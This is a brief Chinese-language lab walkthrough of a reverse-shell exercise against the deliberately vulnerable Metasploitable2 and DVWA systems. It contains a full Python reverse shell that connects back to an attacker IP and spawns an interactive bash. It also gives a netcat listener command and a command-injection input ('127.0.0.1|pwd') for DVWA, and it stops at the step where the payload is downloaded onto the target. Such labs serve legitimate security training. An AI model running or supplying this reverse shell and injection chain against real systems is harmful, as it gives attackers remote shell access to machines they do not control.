反弹shell实验
实验环境:metasploitable2;dvwa-linux版
操作过程
-
进入kali的web服务根目录/var/www/html,写入
getshell.py
的python程序#leafpad getshell.py import socket,subprocess,os s=socket. socket( socket.AF_INET , socket. SOCK_STREAM) s. connect(("192.168.5.128", 1234) ) #CHANGE THIS os.dup2(s. fileno() ,0) os.dup2(s. fileno() ,1) os.dup2(s. fileno() ,2) p=subprocess. call(["/bin/bash","-i"] )
-
在kali中使用shell命令
/etc/init.d/apache2 start
开启apache服务 -
在kali中监听1234端口
nc -vnlp 1234
-
打开浏览器,进入DVWA中,在命令执行中输入
127.0.0.1|pwd
得到命令执行漏洞路径 -
metasploitable2中进入/var/www/dvwa/vulnerabilities/exec路径中,下载
getshell.py